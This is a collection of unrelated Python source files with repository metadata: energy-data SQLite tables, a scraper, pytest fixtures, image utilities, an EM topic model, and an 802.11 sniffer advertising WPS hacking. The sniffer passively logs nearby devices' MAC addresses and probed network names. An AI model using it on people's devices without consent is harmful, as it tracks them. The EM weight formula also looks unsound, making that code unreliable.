    """Load the weekend A/C consumption series into acPowerWeekend, keyed by hour."""
    with conn:
        for hour, used in enumerate(acPowerWeekend):
            c.execute("INSERT OR IGNORE INTO acPowerWeekend VALUES (?, ?)", (hour, used))

insert_acPowerWeekend()

def get_hourly_acPowerWeekend_from_db(dayTime):
    """Return the (powerUsed,) row for weekend hour *dayTime*, or None."""
    c.execute("SELECT powerUsed FROM acPowerWeekend WHERE dayTime=?", (dayTime,))
    return c.fetchone()

def convert_to_int_get_hourly_acPowerWeekend_from_db(dayTime):
    """Bare weekend A/C power value for hour *dayTime*."""
    return get_hourly_acPowerWeekend_from_db(dayTime)[0]
#############################****************** create a carChargerPowerWeek table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS carChargerPowerWeek (
dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
powerUsed INTEGER )""")
#### Insertion Methods in the database for carChargerPowerWeek table ####
def insert_carChargerPowerWeek(): # insert what is the car charger power consumption during week days
with conn:
i = 0
for item in carChargerPowerWeek:
c.execute("INSERT OR IGNORE INTO carChargerPowerWeek VALUES (?, ?)", (i, item))
i = i + 1
#### Insert car charger power consumption during the week in database ####
insert_carChargerPowerWeek()
def get_hourly_carChargerPowerWeek_from_db(dayTime): # get hourly power consumption during week days by id / dayTime
c.execute("SELECT powerUsed FROM carChargerPowerWeek WHERE dayTime=?", (dayTime,))
#c.execute("SELECT * FROM carChargerPowerWeek") ### For debug only ####
return c.fetchone()
#### convert the value of when the carChargerPowerWeek temperature at x hour of the day to int ####
def convert_to_int_get_hourly_carChargerPowerWeek_from_db(dayTime):
y = get_hourly_carChargerPowerWeek_from_db(dayTime)
z = y[0]
return z
#print (get_hourly_carChargerPowerWeek_from_db())
#############################****************** create a carChargerPowerWeekend table *******************###############
c.execute(""" CREATE TABLE IF NOT EXISTS carChargerPowerWeekend (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                powerUsed INTEGER )""")

#### Insertion Methods in the database for carChargerPowerWeekend table ####
def insert_carChargerPowerWeekend():
    """Insert the hourly car-charger power consumption for weekend days.

    One row per hour: dayTime is the index into the module-level
    ``carChargerPowerWeekend`` list, powerUsed its value.
    """
    with conn:
        # enumerate() replaces the original manual ``i = i + 1`` counter
        for hour, power in enumerate(carChargerPowerWeekend):
            c.execute("INSERT OR IGNORE INTO carChargerPowerWeekend VALUES (?, ?)", (hour, power))

#### Insert car charger power consumption during the weekend in database ####
insert_carChargerPowerWeekend()

def get_hourly_carChargerPowerWeekend_from_db(dayTime):
    """Return the (powerUsed,) row for hour *dayTime*, or None if absent."""
    c.execute("SELECT powerUsed FROM carChargerPowerWeekend WHERE dayTime=?", (dayTime,))
    return c.fetchone()

#### convert the fetched carChargerPowerWeekend row at x hour of the day to int ####
def convert_to_int_get_hourly_carChargerPowerWeekend_from_db(dayTime):
    """Return the bare powerUsed value (first column of the fetched row)."""
    return get_hourly_carChargerPowerWeekend_from_db(dayTime)[0]
#print (get_hourly_carChargerPowerWeekend_from_db())
#############################****************** create a creditGeneratedWeek table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS creditGeneratedWeek (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                credit INTEGER )""")

#### Insertion Methods in the database for creditGeneratedWeek table ####
def insert_creditGeneratedWeek():
    """Insert the hourly credit generated during week days.

    One row per hour: dayTime is the index into the module-level
    ``creditGeneratedWeek`` list, credit its value.
    """
    with conn:
        # enumerate() replaces the original manual ``i = i + 1`` counter
        for hour, amount in enumerate(creditGeneratedWeek):
            c.execute("INSERT OR IGNORE INTO creditGeneratedWeek VALUES (?, ?)", (hour, amount))

#### Insert credit generated during the week in database ####
insert_creditGeneratedWeek()

def get_hourly_creditGeneratedWeek_from_db(dayTime):
    """Return the (credit,) row for hour *dayTime*, or None if absent."""
    c.execute("SELECT credit FROM creditGeneratedWeek WHERE dayTime=?", (dayTime,))
    return c.fetchone()

#### convert the fetched creditGeneratedWeek row at x hour of the day to int ####
def convert_to_int_get_hourly_creditGeneratedWeek_from_db(dayTime):
    """Return the bare credit value (first column of the fetched row)."""
    return get_hourly_creditGeneratedWeek_from_db(dayTime)[0]
#print (get_hourly_creditGeneratedWeek_from_db())
#############################****************** create a creditGeneratedWeekend table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS creditGeneratedWeekend (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                credit INTEGER )""")

#### Insertion Methods in the database for creditGeneratedWeekend table ####
def insert_creditGeneratedWeekend():
    """Insert the hourly credit generated during weekend days.

    One row per hour: dayTime is the index into the module-level
    ``creditGeneratedWeekend`` list, credit its value.
    """
    with conn:
        # enumerate() replaces the original manual ``i = i + 1`` counter
        for hour, amount in enumerate(creditGeneratedWeekend):
            c.execute("INSERT OR IGNORE INTO creditGeneratedWeekend VALUES (?, ?)", (hour, amount))

#### Insert credit generated during the weekend in database ####
insert_creditGeneratedWeekend()

def get_hourly_creditGeneratedWeekend_from_db(dayTime):
    """Return the (credit,) row for hour *dayTime*, or None if absent."""
    c.execute("SELECT credit FROM creditGeneratedWeekend WHERE dayTime=?", (dayTime,))
    return c.fetchone()

#### convert the fetched creditGeneratedWeekend row at x hour of the day to int ####
def convert_to_int_get_hourly_creditGeneratedWeekend_from_db(dayTime):
    """Return the bare credit value (first column of the fetched row)."""
    return get_hourly_creditGeneratedWeekend_from_db(dayTime)[0]
#print (get_hourly_creditGeneratedWeekend_from_db())
#############################****************** create a energyToBuyWeek table *******************#####################
c.execute(""" CREATE TABLE IF NOT EXISTS energyToBuyWeek (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                debit INTEGER )""")

#### Insertion Methods in the database for energyToBuyWeek table ####
def insert_energyToBuyWeek():
    """Insert the hourly energy-purchase debit during week days.

    One row per hour: dayTime is the index into the module-level
    ``energyToBuyWeek`` list, debit its value.
    """
    with conn:
        # enumerate() replaces the original manual ``i = i + 1`` counter
        for hour, amount in enumerate(energyToBuyWeek):
            c.execute("INSERT OR IGNORE INTO energyToBuyWeek VALUES (?, ?)", (hour, amount))

#### Insert debit generated during the week in database ####
insert_energyToBuyWeek()

def get_hourly_energyToBuyWeek_from_db(dayTime):
    """Return the (debit,) row for hour *dayTime*, or None if absent."""
    c.execute("SELECT debit FROM energyToBuyWeek WHERE dayTime=?", (dayTime,))
    return c.fetchone()

#### convert the fetched energyToBuyWeek row at x hour of the day to int ####
def convert_to_int_get_hourly_energyToBuyWeek_from_db(dayTime):
    """Return the bare debit value (first column of the fetched row)."""
    return get_hourly_energyToBuyWeek_from_db(dayTime)[0]
#print (get_hourly_energyToBuyWeek_from_db())
#############################****************** create a energyToBuyWeekend table *******************###################
c.execute(""" CREATE TABLE IF NOT EXISTS energyToBuyWeekend (
                dayTime INTEGER PRIMARY KEY AUTOINCREMENT,
                debit INTEGER )""")

#### Insertion Methods in the database for energyToBuyWeekend table ####
def insert_energyToBuyWeekend():
    """Insert the hourly energy-purchase debit during weekend days.

    One row per hour: dayTime is the index into the module-level
    ``energyToBuyWeekend`` list, debit its value.
    """
    with conn:
        # enumerate() replaces the original manual ``i = i + 1`` counter
        for hour, amount in enumerate(energyToBuyWeekend):
            c.execute("INSERT OR IGNORE INTO energyToBuyWeekend VALUES (?, ?)", (hour, amount))

#### Insert credit cost during the weekend in database ####
insert_energyToBuyWeekend()

def get_hourly_energyToBuyWeekend_from_db(dayTime):
    """Return the (debit,) row for hour *dayTime*, or None if absent."""
    c.execute("SELECT debit FROM energyToBuyWeekend WHERE dayTime=?", (dayTime,))
    return c.fetchone()

#### convert the fetched energyToBuyWeekend row at x hour of the day to int ####
def convert_to_int_get_hourly_energyToBuyWeekend_from_db(dayTime):
    """Return the bare debit value (first column of the fetched row)."""
    return get_hourly_energyToBuyWeekend_from_db(dayTime)[0]
#print (get_hourly_energyToBuyWeekend_from_db())
# #############################****************** create a freeVariable table *******************#####################
#
# c.execute(""" CREATE TABLE IF NOT EXISTS freeVariable (
# id INTEGER PRIMARY KEY AUTOINCREMENT,
# val INTEGER )""")
#
# #### Insertion Methods in the database for tempPrefSimple0 table ####
# def insert_freeVariable(idn): # insert what is the preferred temperature during weekend days
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (:id, :val)", {'id': idn.id, 'val': idn.val})
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (2, numPanels))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (3, numLights))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (4, oneLightPower))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (5, outsideTemp))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (6, indoorTemp))
# c.execute("INSERT INTO tempPrefWeekend1 VALUES (?, ?)", (7, sleepingTemp))
#
# # c.execute("INSERT INTO employee VALUES (:first, :last, :pay)",
# # {'first': emp.first, 'last': emp.last, 'pay': emp.pay})
# #### Insert preferred temperature during the weekend in database ####
# insert_freeVariable()
#
# def freeVariable_from_db(): # get hourly prefered temperature days during weekend days by id / idn
# #c.execute("SELECT val FROM freeVariable WHERE val=?", (idn,))
# c.execute("SELECT * FROM freeVariable") ### For debug only ####
# return c.fetchone()
# print(freeVariable_from_db())
#
# #### convert the value of when the freeVariable temperature at x hour of the day to int ####
# def convert_to_int_freeVariable_from_db(idn):
# y = freeVariable_from_db(idn)
# z = y[0]
# return z
# #print (get_hourly_freeVariable_from_db())
#conn.close() # close database
| [
"noreply@github.com"
] | noreply@github.com |
6e1387d82d992492af8d31aff4beea24595cbe8d | e7ae11013d03df592a142f225df345df70451d33 | /update/parser_zasa.py | 39a9d4f857d79d07485f826623b39224fabec6be | [
"MIT"
] | permissive | kuna/iidxranktable | 7028bef5ca410b207e18b45a5ba3f2f6e5d51739 | 7182baaf25b76a8f696e96947d85d4b1d074ba4a | refs/heads/master | 2021-09-15T01:11:03.931539 | 2021-08-04T10:21:26 | 2021-08-04T10:21:26 | 32,804,915 | 8 | 0 | null | 2016-02-12T16:49:49 | 2015-03-24T14:47:43 | Python | UTF-8 | Python | false | false | 1,544 | py | #-*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import urllib
import re
def getGroup(arr, g):
    """Return the (name, songs) entry in *arr* whose name equals *g*.

    If no such group exists yet, a fresh ``(g, [])`` tuple is appended to
    *arr* and returned, so the caller can mutate its song list in place.
    """
    existing = next((entry for entry in arr if entry[0] == g), None)
    if existing is not None:
        return existing
    created = (g, [])
    arr.append(created)
    return created
#
# ==================================================================
#
# One thin wrapper per difficulty level; each simply forwards the level
# number (as a string) to parse().
def parse6():
    return parse("6")

def parse7():
    return parse("7")

def parse8():
    return parse("8")

def parse9():
    return parse("9")

def parse10():
    return parse("10")

def parse11():
    return parse("11")

def parse12():
    return parse("12")
def parse(diff):
    """Fetch and parse the zasa.sakura.ne.jp DP ranking table for level *diff*.

    Returns a list of ``(group_title, [(song_title, difficulty), ...])``
    tuples, where difficulty is one of the "DPx" chart codes.
    """
    # common
    # http://stackoverflow.com/questions/17509607/submitting-to-a-web-form-using-python
    formdata = {
        'env': 'a230',
        'submit': '%E8%A1%A8%E7%A4%BA',  # u'表示' (already percent-encoded; urlencode re-encodes it)
        'cat': 0,
        'mode': 'p1',
        'offi': diff,
    }
    formdata_raw = urllib.urlencode(formdata)
    # BUG FIX: ``urllib.Request`` and ``urllib.request`` do not exist in the
    # Python 2 ``urllib`` module imported by this file (they raised
    # AttributeError).  In Python 2, passing the encoded form data as the
    # second argument to urllib.urlopen performs the POST directly.
    data = urllib.urlopen("http://zasa.sakura.ne.jp/dp/rank.php", formdata_raw).read()
    soup = BeautifulSoup(data, "lxml")  # parser 'lxml' suppresses the default-parser warning

    res = []  # [(group, [(song name, diff), ..]), ..]
    table = soup.find('table', class_="rank_p1")
    trs = table.find_all('tr')
    group_title = ''
    for tr in trs[1:-1]:
        # first col: difficulty group label for this row
        group_title = tr.find_all('td')[0].get_text()
        for sp in tr.find_all('span'):
            sp_text = sp.get_text()
            title = sp_text[:-4]
            # renamed from ``diff`` so the parameter is not shadowed
            chart = "DP" + sp['class'][0].upper()
            if chart == "DPL":
                # "L" appears to mark a Leggendaria chart; it is stored as
                # DPA with an " (L)" suffix on the title.
                chart = "DPA"
                title += " (L)"
            group = getGroup(res, group_title)
            group[1].append((title, chart))
    return res
| [
"kgdgwn98@gmail.com"
] | kgdgwn98@gmail.com |
efd792efcef452aa13a12e22f971062fd6a4fc81 | 5bba21208673ad4a43ae84bde1ac861b8b857a7e | /conftest.py | f31019dcb2c13e0c9ce272ab9cbd4894e2862358 | [] | no_license | gongzuo666/teach | d9c79a889c77663a1594bd148ead7532a26bd31c | 5ce6839cbe69e8094338de9110885faf28c49cbb | refs/heads/master | 2023-01-06T21:09:01.064643 | 2020-11-03T08:17:26 | 2020-11-03T08:17:27 | 309,554,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,962 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @File : conftest.py
# Author: tian guang yuan
# Time : 2020/6/21 21:54
import pytest
import json
from Lib.ApiLogin import LoginClass
from Lib.ApiLesson import LessonClass
@pytest.fixture(scope='module', autouse=True)  # environment init / data cleanup
def delete_all_lesson(request):
    """Module-scoped autouse fixture: wipe every course before and after tests.

    Logs in once, deletes all existing courses, and registers a finalizer
    that deletes whatever courses the tests created.
    """
    print('-------------------开始-------------------')
    # 1. log in
    session = LoginClass().login('{"username": "auto","password": "sdfsdfsdf"}')

    def _purge_lessons():
        # List courses page by page and delete them until none remain.
        # (The original duplicated this loop in setup and teardown.)
        inData = {'action': 'list_course',
                  'pagenum': 1,
                  'pagesize': '20'
                  }
        resList = json.loads(LessonClass().list_lesson(session, inData))['retlist']
        while resList != []:
            for one in resList:
                lessonId = one['id']  # course id
                # delete every listed course
                LessonClass().delete_all_lesson(session, lessonId)
            resList = json.loads(LessonClass().list_lesson(session, inData))['retlist']

    # 2./3. remove every pre-existing course
    _purge_lessons()
    print('---------------------结束-------------------')

    # teardown: restore a clean state after the module's tests ran
    def fin():
        print('-----------测试数据恢复-------------')
        _purge_lessons()

    request.addfinalizer(fin)
| [
"15100978670@163.com"
] | 15100978670@163.com |
2606c17e45322b2f7607fa4df41b209d3ef5fb13 | fb1964b66da85ed65bd7ed348e127bbf4cbaf6d0 | /myCal2/bigCal.py | a17b6236c3b3542f4debae3b83a675c595d05734 | [] | no_license | iimseunghyun/mypython | 2ee157cd3bc5eeae224326660d59c42c400632b2 | 432677a3d24ffd8f4f145c077b0782440e4e8bf4 | refs/heads/master | 2021-03-25T17:45:33.573778 | 2020-03-16T07:25:52 | 2020-03-16T07:25:52 | 247,636,958 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 936 | py | class BigNum:
digit =[
"000000...00...00...000000",
"....1....1....1....1....1",
"22222....2222222....22222",
"33333....333333....333333",
"4...44...444444....4....4",
"555555....55555....555555",
"666666....666666...666666",
"77777....7....7....7....7",
"888888...8888888...888888",
"999999...999999....999999",
".......#...###...#.......", #10
"...........###...........", #11
"......#.#...#...#.#......", #12
"........#...#...#........" #13
]
myBigNum = ""
    def __init__(self, num):
        # index into ``digit`` selecting which glyph to render
        self.num = num
def mkBigNum(self):
for x in range(5):
n=[]
for y in range(5):
n.append(self.digit[self.num][x*5+y])
print ("%s%s%s%s%s" %(n[0],n[1],n[2],n[3],n[4]))
if __name__ == "__main__":
bn1 = BigNum(13)
bn1.mkBigNum() | [
"lms-426@hanmail.net"
] | lms-426@hanmail.net |
ba56c4441471b121cb245b3dc7df10afed2be875 | c8fb08b75c19d16719c31a5f6aa368372f8d410c | /rotate.py | ea231ad9b865b54baa56c40b8d4ad573f027bb9f | [] | no_license | leohfigueiredo/Image_proc_init | 7efbfefddf37e8673249f6b5355f170f50b31fa7 | f79ce5ae9a284d74775fca5f67267fb79bff3d9f | refs/heads/master | 2022-12-09T14:10:57.682981 | 2020-09-07T23:07:26 | 2020-09-07T23:07:26 | 293,649,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | import cv2
import matplotlib.pyplot as plt
# read the image in grayscale
img = cv2.imread("Lenna.png", 0)
rows, cols = img.shape
# rotate for 45 degree counter-clockwise respect to the center of the image
M = cv2.getRotationMatrix2D((cols/2, rows/2), 45, 1)
dst = cv2.warpAffine(img, M, (cols, rows))
# display image
plt.figure()
plt.imshow(dst, cmap="gray")
plt.show()
| [
"leohfigueiredo@gmail.com"
] | leohfigueiredo@gmail.com |
369d942517debc6f30b559509854cb06ba1ef9e5 | 27d0ea837489f68978287e369b60faa57eeb2497 | /examples/wifiz.py | 9044f15d865520323e139912c9568d0c8210365d | [] | no_license | nimdavtanke/wifi-scripts | 9692a4c67d23cc1a7d076d6a41be2bdd6cf4d3ce | 83576bcbf62cdfe020b5c2178f9ab177733de1dc | refs/heads/master | 2016-08-06T15:20:47.206467 | 2015-03-28T08:37:16 | 2015-03-28T08:37:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,227 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# 802.11 sniffer/wpsig/wpspin/reaver
# Credits go to:
#
# Craig Heffner Tactical Network Solutions
# https://github.com/devttys0/wps
#
# WPSIG [ablanco@coresecurity.com, oss@coresecurity.com]
__author__ = '090h'
__license__ = 'GPL'
from sys import argv, exit
from os import path, geteuid
# import logging
# logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
# from scapy.all import conf
# conf.verb = 1
# conf.use_pcap = True
# conf.use_dnet = False
from scapy.layers.dot11 import *
from scapy.all import *
# impacket
try:
    from impacket import dot11
    from impacket.dot11 import Dot11
    from impacket.dot11 import Dot11Types
    from impacket.dot11 import Dot11ManagementFrame
    from impacket.dot11 import Dot11ManagementProbeRequest
    from impacket.ImpactDecoder import RadioTapDecoder
except ImportError:
    # BUG FIX: the original built ``Exception("impacket")`` without raising
    # it, silently swallowing the missing dependency; re-raise so the
    # failure is visible (mirrors the hard exit used for Windows below).
    raise ImportError("impacket")
from pprint import pprint
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
# Platform gating: injection needs PyLorcon2 (Linux only); Windows is
# unsupported; OS X falls back to passive sniffing.
if LINUX:
    # print('Linux detected. Trying to import PyLorcon2...')
    try:
        import PyLorcon2
    except ImportError:
        logging.warning('PyLorcon2 import failed. Injection is not available.')

if WINDOWS:
    logging.error('Sorry, no Windows.')
    exit(-1)

if DARWIN:
    logging.warning('OS X detected. Only pasive mode will be available')

# TODO: add iOS and Android detection

# 802.11 frame type/subtype for management probe requests
PROBE_REQUEST_TYPE = 0
PROBE_REQUEST_SUBTYPE = 4
class WiFiWizard(object):
def __init__(self, iface, output=None, whitelist=None, verbose=False):
# Replace this with your phone's MAC address
if not whitelist: whitelist = ['00:00:00:00:00:00', ]
self.iface = iface
self.whitelist = whitelist
self.verbose = verbose
self.aps = {}
self.clients = {}
# Probe requests from clients
def handle_probe(self, pkt):
if pkt.haslayer(Dot11ProbeReq) and '\x00' not in pkt[Dot11ProbeReq].info:
essid = pkt[Dot11ProbeReq].info
else:
essid = 'Hidden SSID'
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist:
#TODO: add logging
return
# New client
if client not in self.clients:
self.clients[client] = []
print('[!] New client: %s ' % client)
if essid not in self.clients[client]:
self.clients[client].append(essid)
print('[+] New ProbeRequest: from %s to %s' % (client, essid))
def handle_beacon(self, pkt):
if not pkt.haslayer(Dot11Elt):
return
# Check to see if it's a hidden SSID
essid = pkt[Dot11Elt].info if '\x00' not in pkt[Dot11Elt].info and pkt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pkt[Dot11].addr3
client = pkt[Dot11].addr2
if client in self.whitelist or essid in self.whitelist or bssid in self.whitelist:
#TODO: add logging
return
try:
channel = int(ord(pkt[Dot11Elt:3].info))
except:
channel = 0
try:
extra = pkt.notdecoded
rssi = -(256-ord(extra[-4:-3]))
except:
rssi = -100
p = pkt[Dot11Elt]
capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}"
"{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
# print('capability = %s' % capability)
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 48:
crypto.add("WPA2")
elif p.ID == 221 and p.info.startswith('\x00P\xf2\x01\x01\x00'):
crypto.add("WPA")
p = p.payload
if not crypto:
if 'privacy' in capability:
crypto.add("WEP")
else:
crypto.add("OPN")
enc = '/'.join(crypto)
if bssid not in self.aps:
self.aps[bssid] = (channel, essid, bssid, enc, rssi)
print "[+] New AP {0:5}\t{1:20}\t{2:20}\t{3:5}\t{4:4}".format(channel, essid, bssid, enc, rssi)
def pkt_handler(self, pkt):
# wlan.fc.type == 0 Management frames
# wlan.fc.type == 1 Control frames
# wlan.fc.type == 2 Data frames
# wlan.fc.type_subtype == 0 Association request
# wlan.fc.type_subtype == 1 Association response
# wlan.fc.type_subtype == 2 Reassociation request
# wlan.fc.type_subtype == 3 Reassociation response
# wlan.fc.type_subtype == 4 Probe request
# wlan.fc.type_subtype == 5 Probe response
# wlan.fc.type_subtype == 8 Beacon
try:
print('-->', pkt.name)
except:
pass
#Beacon
if pkt.haslayer(Dot11Beacon):
self.handle_beacon(pkt)
# Client ProbeReq
if pkt.haslayer(Dot11ProbeReq):
self.handle_request(pkt)
# if pkt.type == PROBE_REQUEST_TYPE and pkt.subtype == PROBE_REQUEST_SUBTYPE:
if pkt.haslayer(Dot11ProbeResp):
self.handle_response(pkt)
def sniff(self):
'''
Sniff Beacon and Probe Requst/Response frames to extract AP info
:param count: packets to capture, 0 = loop
:return:
'''
print('Press Ctrl-C to stop sniffing.')
sniff(iface=self.iface,
prn=self.pkt_handler,
lfilter=lambda p: p.haslayer(Dot11))
if __name__ == '__main__':
    # CLI: positional interface plus (currently unused) channel/wps/active flags
    parser = ArgumentParser(description='WiFi PWN T00L', formatter_class=ArgumentDefaultsHelpFormatter)
    parser.add_argument('--version', action='version', version='%(prog)s 1.0')
    parser.add_argument('interface', help='802.11 interface to use')
    parser.add_argument('-c', '--channel', required=False)
    parser.add_argument('-w', '--wps', required=False, action='store_true', help='wps hack')
    parser.add_argument('-a', '--active', required=False, action='store_true', help='active mode')
    args = parser.parse_args()
    # raw sockets for sniffing require root
    if geteuid() != 0:
        exit("You need to have root privileges to run this script.\nPlease try again, this time using 'sudo'.")
    WiFiWizard(args.interface).sniff()
| [
"oleg.kupreev@gmail.com"
] | oleg.kupreev@gmail.com |
cc339d3a4c500a7f726c3be25016416989effdf5 | 8186368ed5062106a1dca6677b6542ce67e890a9 | /util/get_similar_fromid.py | 087a9797fbff07cd36632e847ed600cc3fcedcee | [] | no_license | sunyuzhao/group_profiles | 993d28cf9cd8867d10f6eb4d19f5c41459c768a5 | c2773551b35c618ad6adbeb1b83ab4c2e57b52ec | refs/heads/master | 2020-04-26T02:19:06.163166 | 2018-04-11T06:33:46 | 2018-04-11T06:33:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,093 | py | # -*- coding: utf-8 -*-
import sys
import requests
from urllib2 import urlopen
from urllib import urlencode
import json
reload(sys)
sys.setdefaultencoding("utf-8")
KEY_TO_FROM_ID = 'http://dataplatform.yidian.com:8083/api/other/channel_query/query_all'
FROM_ID_SIMILAR = 'http://10.111.0.129:3303/info'
def get_fromid_from_keyword(keyword):
    """POST *keyword* to the channel-query API and return (fromid, name).

    The response body is parsed as "fromid-name,..." and only the first
    comma-separated entry is used (assumption from this parsing code —
    confirm against the API).
    """
    (fromid, name) = requests.post(KEY_TO_FROM_ID, data={
        'word': keyword
    }).text.split(',')[0].split('-')
    return fromid, name
def get_similar_from_id(from_id):
    """Query the similarity service for *from_id* and print name/value pairs.

    Only prints when the JSON response reports status == 'success'.
    """
    query = {
        'method': 'cbow',
        'interest': 'fromid:%s' % from_id
    }
    json_result = json.loads(urlopen('%s?%s' % (FROM_ID_SIMILAR, urlencode(query))).read())
    if json_result['status'] == 'success':
        for item in json_result['result']:
            print '%s\t%f' % (item['name'], item['value'])
if __name__ == '__main__':
    # usage: python get_similar_fromid.py <keyword>
    keyword = sys.argv[1]
    from_id, name = get_fromid_from_keyword(keyword)
    print 'from_id=%s 频道名=%s' % (from_id, name)
    print '----------------------------------'
    get_similar_from_id(from_id)
| [
"js982986555@live.com"
] | js982986555@live.com |
051ee8415a1c0bdf5dcf6ba43751abb4505e5215 | 53f415d67dd3304c16d8a3e51d34a2ea02249bc7 | /NIPS Topic Model.py | 50b0b09b8bd4f5d4684fe972a2bfc165621286d9 | [
"MIT"
] | permissive | munsheet/EM | c6b599c4b6dc5c9fc039e3b79aca272cd08ec76c | 921752f79e78a4cb6f9e51166d992a7b14af0366 | refs/heads/master | 2021-01-19T09:13:18.120286 | 2017-04-09T20:47:58 | 2017-04-09T20:47:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,694 | py | # import libs
import numpy as np
import matplotlib.pyplot as plt
import sys
from math import log
# read data
file = open('data/docword.nips.txt', 'r')
data = [int(datum) for datum in file.read().split()]
D = data[0]
W = data[1]
NNZ = data[2]
data = data[3:]
# store data as numpy matrix
x = np.zeros((D, W))
for i in range(0, NNZ, 3):
x[data[i]-1, data[i+1] - 1] = data[i+2]
J = 30 # number of topics/ clusters
# p corresponds to probability of word in a topic
p = np.ones((J, W))
p = 1.0/W * p
# pi corresponds to probability that document belongs to topic
pi = np.ones(J)
pi = 1.0/J * pi
# function to get w_i,j
def w(i, j):
    """Responsibility-style weight of topic j for document i.

    Forms pi[j] * prod_k p[j,k]**x[i,k] in the numerator.
    NOTE(review): the products of p**x underflow to 0.0 for realistic
    document lengths (risking 0/0), and the denominator *multiplies*
    across topics where a mixture posterior normally sums — confirm the
    intended formula; a log-space (logsumexp) formulation would be safer.
    """
    numerator = 1.0
    denominator = 1.0
    for l in range(J):
        for k in range(W):
            temp = p[l,k]**x[i,k]
            if l == j:
                numerator *= temp
            denominator *= temp
        denominator *= pi[l]
    return (numerator * pi[j])/ denominator
# E-Step computation
def expectation():
    """Expected complete-data log-likelihood Q under the current w(i, j)."""
    Q = 0.0
    for i in range(D):
        print("expectation round", i)
        for j in range(J):
            # per-(doc, topic) term: (log prior + doc's log-likelihood) * weight
            Q += (log(pi[j]) + np.dot(x[i,], np.log(p[j,]))) * w(i,j)
    return Q
# M-Step
def max_p(j):
    """M-step update for topic j's word distribution p[j, :].

    Responsibility-weighted word counts over the weighted total word
    count of each document.
    """
    numer = 0
    denom = 0
    for i in range(D):
        w_ij = w(i,j)   # compute once per document, reused for both sums
        numer += x[i,] * w_ij
        denom += np.sum(x[i,]) * w_ij
    return numer/denom
def max_pi(j):
    """M-step update for the topic prior pi[j]: mean weight over all documents."""
    return sum(w(i, j) for i in range(D)) / D
# EM: alternate E-step (expectation) and M-step (max_p / max_pi) until the
# objective stops moving.
prev_expectation = sys.maxsize
t = 0
while True:
    e = expectation()
    # converged once Q changes by less than an absolute tolerance of 100
    if abs(e - prev_expectation) < 100:
        break
    prev_expectation = e
    for j in range(J):
        p[j,] = max_p(j)
        pi[j] = max_pi(j)
    print(t, e)
    t += 1
| [
"zpahuja2@illinois.edu"
] | zpahuja2@illinois.edu |
f4b5de28e17ca2e76abd4ecf8563070ac8f934bc | 77a5d39b108d07bf0a1516fa8b3fdee71b4e5bb7 | /utils.py | 767aae0096d20c47ac2828d81d7ad855ff773ec1 | [] | no_license | babypure/One-shot-Image-to-Image-Translation | 94ac810c4d2e0384da5d99055cfa4f1f878abbf0 | d23bcd2db77d415ba34c9c01a0a6fd25f8721023 | refs/heads/master | 2022-01-16T00:22:33.797739 | 2019-07-22T09:05:21 | 2019-07-22T09:05:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,190 | py | import tensorflow as tf
from tensorflow.contrib import slim
from scipy import misc
import os, random
import os
import numpy as np
class ImageData:
    # define input data info
    def __init__(self, img_h=256, img_w=256, channels=3, augment_flag=False, if_style=False):
        self.img_h = img_h
        self.img_w = img_w
        self.channels = channels
        self.augment_flag = augment_flag
        self.if_style = if_style

    # read image file from file path
    def image_processing(self, filename):
        """Decode a JPEG, resize to (img_h, img_w), scale to [-1, 1]; with
        augment_flag set, randomly (80% of calls) flip + crop."""
        x = tf.read_file(filename)
        x_decode = tf.image.decode_jpeg(x, channels=self.channels)
        img = tf.image.resize_images(x_decode, [self.img_h, self.img_w])
        # shift value to -1 ~ 1
        img = tf.cast(img, tf.float32)/127.5-1

        if(self.augment_flag):
            # enlarge by 30 px at 256-resolution, else 15, before cropping back
            augment_size_h = self.img_h + (30 if self.img_h == 256 else 15)
            augment_size_w = self.img_w + (30 if self.img_w == 256 else 15)
            p = random.random()
            if(p>0.2):
                # random crop and flip; style images get an extra +100 px margin
                if(self.if_style):
                    img = self.augmentation(img, augment_size_h+100, augment_size_w+100)
                else:
                    img = self.augmentation(img, augment_size_h, augment_size_w)
        return img

    def augmentation(self, image, aug_img_h, aug_img_w):
        """Random horizontal flip, upscale to (aug_img_h, aug_img_w), then
        random-crop back to the original shape (one shared seed per call)."""
        seed = random.randint(0, 2 ** 31 - 1)
        ori_image_shape = tf.shape(image)
        image = tf.image.random_flip_left_right(image, seed=seed)
        image = tf.image.resize_images(image, [aug_img_h, aug_img_w])
        image = tf.random_crop(image, ori_image_shape, seed=seed)
        return image
def load_test_data(image_path, size_h=256, size_w=256):
    """Load one RGB image, resize, add a batch axis and scale to [-1, 1]."""
    img = misc.imread(image_path, mode='RGB')
    img = misc.imresize(img, [size_h, size_w])
    img = np.expand_dims(img, axis=0)   # (1, h, w, 3) for batch-shaped models
    img = img/127.5 - 1 # -1 ~ 1
